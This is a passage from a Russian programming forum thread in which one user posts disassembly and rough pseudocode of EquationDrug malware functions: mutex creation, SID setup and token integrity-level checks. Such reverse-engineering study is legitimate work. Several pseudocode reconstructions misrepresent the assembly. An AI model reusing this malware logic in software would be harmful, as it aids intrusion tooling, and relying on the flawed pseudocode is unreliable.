
add	esp, 8
neg	eax
sbb	eax, eax
inc	eax
mov	[ebp+var_24], eax

loc_401BE7:
mov	[ebp+var_4], 0
call	sub_401BF5
jmp	short loc_401C13
sub_401A80 endp

*/
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 08:44   #8
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Инициализация мьютекса (EquationDrug)

Код:
void sub_401C50()
{
_SECURITY_ATTRIBUTES MutexAttributes;
DWORD pSecurityDescriptor;
InitializeSecurityDescriptor(&pSecurityDescriptor, 1);
CreateMutexW(&MutexAttributes, 0, "prkMtx");
}
Код:
/*
; Attributes: bp-based frame

sub_401C50 proc	near

MutexAttributes= _SECURITY_ATTRIBUTES ptr -20h
pSecurityDescriptor= dword ptr -14h

push	ebp
mov	ebp, esp
sub	esp, 20h
push	1		; dwRevision
lea	eax, [ebp+pSecurityDescriptor]
push	eax		; pSecurityDescriptor
call	ds:InitializeSecurityDescriptor

InitializeSecurityDescriptor(&pSecurityDescriptor, 1);

test	eax, eax
jz	short loc_401C8D
mov	[ebp+MutexAttributes.nLength], 0Ch
mov	[ebp+MutexAttributes.bInheritHandle], 0
lea	ecx, [ebp+pSecurityDescriptor]


mov	[ebp+MutexAttributes.lpSecurityDescriptor], ecx
push	offset Name	; "prkMtx"
push	0		; bInitialOwner
lea	edx, [ebp+MutexAttributes]
push	edx		; lpMutexAttributes
call	ds:CreateMutexW

CreateMutexW(&MutexAttributes, 0, "prkMtx");

jmp	short loc_401C8F

loc_401C8D:
xor	eax, eax

loc_401C8F:
mov	esp, ebp
pop	ebp
retn
sub_401C50 endp

align 10h

*/
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 08:54   #9
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Получение идентификатора прав доступа SID (EquationDrug)

Код:
void sub_401CA0()
{
var_18=0;
var_C4=1;
var_20=0;
pSid=0;
nSubAuthority0=0;
var_4=0;
var_4=1;

memset(GetCurrentProcessId(), 0, 0x94);
VersionInformation.dwOSVersionInfoSize = 0x94;
GetVersionExA(&VersionInformation);
for(i=0;i<5;i++)
pIdentifierAuthority.Value[i]=0;
pIdentifierAuthority.Value[5]=0x10;
AllocateAndInitializeSid(&pIdentifierAuthority, 1, nSubAuthority0, 0,0,0,0,0,0,0,&pSid);
AllocateAndInitializeSid(&pIdentifierAuthority, 1, 0x4000,0,0,0,0,0,0,0,&var_20);
}
Код:
/*

; Attributes: bp-based frame

sub_401CA0 proc	near

hObject= dword ptr -0F8h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY	ptr -0D4h
var_CC=	dword ptr -0CCh
var_C8=	dword ptr -0C8h
var_C4=	dword ptr -0C4h
pSid= dword ptr	-0C0h
var_BC=	dword ptr -0BCh
VersionInformation= _OSVERSIONINFOA ptr	-0B8h
var_20=	dword ptr -20h
nSubAuthority0=	dword ptr -1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4

; FUNCTION CHUNK AT 00401FC4 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00401FE7 SIZE 00000017 BYTES

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409238
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFEF4h
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_C4], 1
mov	[ebp+var_20], 0
mov	[ebp+pSid], 0
mov	[ebp+nSubAuthority0], 0
mov	[ebp+var_4], 0
mov	[ebp+var_4], 1

var_18=0;
var_C4=1;
var_20=0;
pSid=0;
nSubAuthority0=0;
var_4=0;
var_4=1;

call	ds:GetCurrentProcessId
mov	[ebp+var_BC], eax
push	94h		; size_t
push	0		; int
lea	eax, [ebp+VersionInformation]
push	eax		; void *
call	memset

memset(GetCurrentProcessId(), 0, 0x94);

add	esp, 0Ch
mov	[ebp+VersionInformation.dwOSVersionInfoSize], 94h

VersionInformation.dwOSVersionInfoSize = 0x94;

lea	ecx, [ebp+VersionInformation]
push	ecx		; lpVersionInformation
call	ds:GetVersionExA ; Get extended	information about the
			; version of the operating system

GetVersionExA(&VersionInformation);

test	eax, eax
jnz	short loc_401D45
mov	[ebp+var_C4], 0
jmp	loc_401F49

loc_401D45:
cmp	[ebp+VersionInformation.dwPlatformId], 2
jnz	loc_401F49
call	sub_401920
test	eax, eax
jnz	loc_401E12
call	sub_401A80
test	eax, eax
jnz	loc_401E12
call	sub_401C50
mov	dword_40B118, eax
cmp	dword_40B118, 0
jz	short loc_401DD1
mov	[ebp+var_CC], 0
lea	edx, [ebp+var_CC]
push	edx
mov	eax, [ebp+var_BC]
push	eax
call	sub_404639
add	esp, 8
mov	[ebp+var_C8], eax
cmp	[ebp+var_C8], 0
jnz	short loc_401DBA
mov	[ebp+var_C4], 1
jmp	short loc_401DCF

loc_401DBA:
call	ds:GetLastError
mov	[ebp+var_C4], 0
jmp	loc_401F49

loc_401DCF:
jmp	short loc_401DDB

loc_401DD1:
mov	[ebp+var_C4], 0

loc_401DDB:
cmp	dword_40B118, 0
jz	short loc_401E10
mov	ecx, dword_40B118
mov	[ebp+hObject], ecx
cmp	[ebp+hObject], 0
jz	short loc_401E06
mov	edx, [ebp+hObject]
push	edx		; hObject
call	ds:CloseHandle

loc_401E06:
mov	dword_40B118, 0

loc_401E10:
jmp	short loc_401E1C

loc_401E12:
mov	[ebp+var_C4], 1

loc_401E1C:
cmp	[ebp+VersionInformation.dwMajorVersion], 6
jb	loc_401F49
call	sub_402000
mov	[ebp+nSubAuthority0], eax
cmp	[ebp+nSubAuthority0], 0FFFFFFFFh
jnz	short loc_401E46
mov	[ebp+var_C4], 0
jmp	loc_401F49

loc_401E46:
cmp	[ebp+nSubAuthority0], 4000h
jnb	loc_401F49
mov	[ebp+pIdentifierAuthority.Value], 0
mov	[ebp+pIdentifierAuthority.Value+1], 0
mov	[ebp+pIdentifierAuthority.Value+2], 0
mov	[ebp+pIdentifierAuthority.Value+3], 0
mov	[ebp+pIdentifierAuthority.Value+4], 0
mov	[ebp+pIdentifierAuthority.Value+5], 10h

lea	eax, [ebp+pSid]
push	eax		; pSid
push	0		; nSubAuthority7
push	0		; nSubAuthority6
push	0		; nSubAuthority5
push	0		; nSubAuthority4
push	0		; nSubAuthority3
push	0		; nSubAuthority2
push	0		; nSubAuthority1
mov	ecx, [ebp+nSubAuthority0]
push	ecx		; nSubAuthority0
push	1		; nSubAuthorityCount
lea	edx, [ebp+pIdentifierAuthority]
push	edx		; pIdentifierAuthority
call	ds:AllocateAndInitializeSid 

test	eax, eax
jnz	short loc_401EBE
call	ds:GetLastError
mov	[ebp+var_C4], 0
jmp	loc_401F49

loc_401EBE:
lea	eax, [ebp+var_20]
push	eax		; pSid
push	0
push	0
push	0
push	0
push	0
push	0
push	0
push	4000h		
push	1
lea	ecx, [ebp+pIdentifierAuthority]
push	ecx
call	ds:AllocateAndInitializeSid 

test	eax, eax
jnz	short loc_401EFA
call	ds:GetLastError
mov	[ebp+var_C4], 0
jmp	short loc_401F49

loc_401EFA:
call	sub_401C50
mov	dword_40B118, eax
cmp	dword_40B118, 0
jz	short loc_401F3F
push	0
push	0
push	0
mov	edx, [ebp+var_20]
push	edx
mov	eax, [ebp+pSid]
push	eax
mov	ecx, [ebp+var_BC]
push	ecx
call	sub_405012
add	esp, 18h
test	eax, eax
jz	short loc_401F3D
mov	[ebp+var_C4], 0
jmp	short loc_401F49

loc_401F3D:
jmp	short loc_401F49

loc_401F3F:
mov	[ebp+var_C4], 0

loc_401F49:
mov	[ebp+var_4], 0
call	sub_401F57
jmp	short loc_401FC4
sub_401CA0 endp

*/
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Старый 25.02.2015, 09:14   #10
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,639
По умолчанию

Получение сведений о токене (EquationDrug)

Код:
/*
void sub_402000()
{
TokenInformation = 0;
ReturnLength = 0;
TokenHandle = 0;
var_4 = 0;
var_4 = 1;
OpenProcessToken(GetCurrentProcess(), 0x18, &TokenHandle)
GetTokenInformation(&TokenHandle, 0x19, 0, 0, &ReturnLength);
LocalAlloc(0, ReturnLength);
TokenInformation=0;
GetTokenInformation(TokenHandle, 0x19, TokenInformation, ReturnLength, ReturnLength);
GetSidSubAuthorityCount(TokenInformation);
GetSidSubAuthority(TokenInformation, nSubAuthority);
}
*/
Код:
/*
; Attributes: bp-based frame

sub_402000 proc	near

var_2C=	dword ptr -2Ch
TokenHandle= dword ptr -28h
var_24=	dword ptr -24h
TokenInformation= dword	ptr -20h
ReturnLength= dword ptr	-1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4

; FUNCTION CHUNK AT 0040217A SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0040219A SIZE 00000014 BYTES

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409250
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFFE4h
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_24], 0FFFFFFFFh
mov	[ebp+TokenInformation],	0
mov	[ebp+ReturnLength], 0
mov	[ebp+TokenHandle], 0
mov	[ebp+var_4], 0
mov	[ebp+var_4], 1

TokenInformation = 0;
ReturnLength = 0;
TokenHandle = 0;
var_4 = 0;
var_4 = 1;

lea	eax, [ebp+TokenHandle]
push	eax		; TokenHandle
push	18h		; DesiredAccess
call	ds:GetCurrentProcess
push	eax		; ProcessHandle
call	ds:OpenProcessToken ; Open the access token associated with a process

OpenProcessToken(GetCurrentProcess(), 0x18, &TokenHandle)


test	eax, eax
jz	loc_402137
lea	ecx, [ebp+ReturnLength]
push	ecx		; ReturnLength
push	0		; TokenInformationLength
push	0		; TokenInformation
push	19h		; TokenInformationClass
mov	edx, [ebp+TokenHandle]
push	edx		; TokenHandle
call	ds:GetTokenInformation ; Get specified type of information
			; about	an access token

GetTokenInformation(&TokenHandle, 0x19, 0, 0, &ReturnLength);

test	eax, eax
jnz	loc_40212F
call	ds:GetLastError
mov	[ebp+var_2C], eax
cmp	[ebp+var_2C], 7Ah
jnz	loc_40212D
mov	eax, [ebp+ReturnLength]
push	eax		; uBytes
push	0		; uFlags
call	ds:LocalAlloc

LocalAlloc(0, ReturnLength);


mov	[ebp+TokenInformation],	eax
cmp	[ebp+TokenInformation],	0

TokenInformation=0;

jz	short loc_40212D
lea	ecx, [ebp+ReturnLength]
push	ecx		; ReturnLength
mov	edx, [ebp+ReturnLength]
push	edx		; TokenInformationLength
mov	eax, [ebp+TokenInformation]
push	eax		; TokenInformation
push	19h		; TokenInformationClass
mov	ecx, [ebp+TokenHandle]
push	ecx		; TokenHandle
call	ds:GetTokenInformation ; Get specified type of information
			; about	an access token

GetTokenInformation(TokenHandle, 0x19, TokenInformation, ReturnLength, ReturnLength);

test	eax, eax
jz	short loc_402127
mov	edx, [ebp+TokenInformation]
mov	eax, [edx]
push	eax		; pSid
call	ds:GetSidSubAuthorityCount

GetSidSubAuthorityCount(TokenInformation);

movzx	ecx, byte ptr [eax]
sub	ecx, 1
movzx	edx, cl
push	edx		; nSubAuthority
mov	eax, [ebp+TokenInformation]
mov	ecx, [eax]
push	ecx		; pSid
call	ds:GetSidSubAuthority

GetSidSubAuthority(TokenInformation, nSubAuthority);

mov	edx, [eax]
mov	[ebp+var_24], edx
cmp	[ebp+var_24], 1000h
jnz	short loc_4020FD
jmp	short loc_402125

loc_4020FD:
cmp	[ebp+var_24], 2000h
jnz	short loc_402108
jmp	short loc_402125

loc_402108:
cmp	[ebp+var_24], 3000h
jnz	short loc_402113
jmp	short loc_402125

loc_402113:
cmp	[ebp+var_24], 4000h
jnz	short loc_40211E
jmp	short loc_402125

loc_40211E:
mov	[ebp+var_24], 0FFFFFFFFh

loc_402125:
jmp	short loc_40212D

loc_402127:
call	ds:GetLastError

loc_40212D:
jmp	short loc_402135

loc_40212F:
call	ds:GetLastError

loc_402135:
jmp	short loc_40213D

loc_402137:
call	ds:GetLastError

loc_40213D:
mov	[ebp+var_4], 0
call	sub_40214B
jmp	short loc_40217A
sub_402000 endp


*/
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Опрос для магистерского исследования Mikhail87 Помощь студентам 11 12.02.2015 07:50
Декомпилирование приложения koljsch Свободное общение 37 26.07.2014 10:33
Удаление руткитов RPG-MARKET Общие вопросы C/C++ 8 04.08.2011 09:13
Декомпилирование HEX кода Drocr Assembler - Ассемблер (FASM, MASM, WASM, NASM, GoASM, Gas, RosAsm, HLA) и не рекомендуем TASM 0 16.12.2010 17:44
Исследования Операции Европеец Помощь студентам 1 09.07.2009 04:41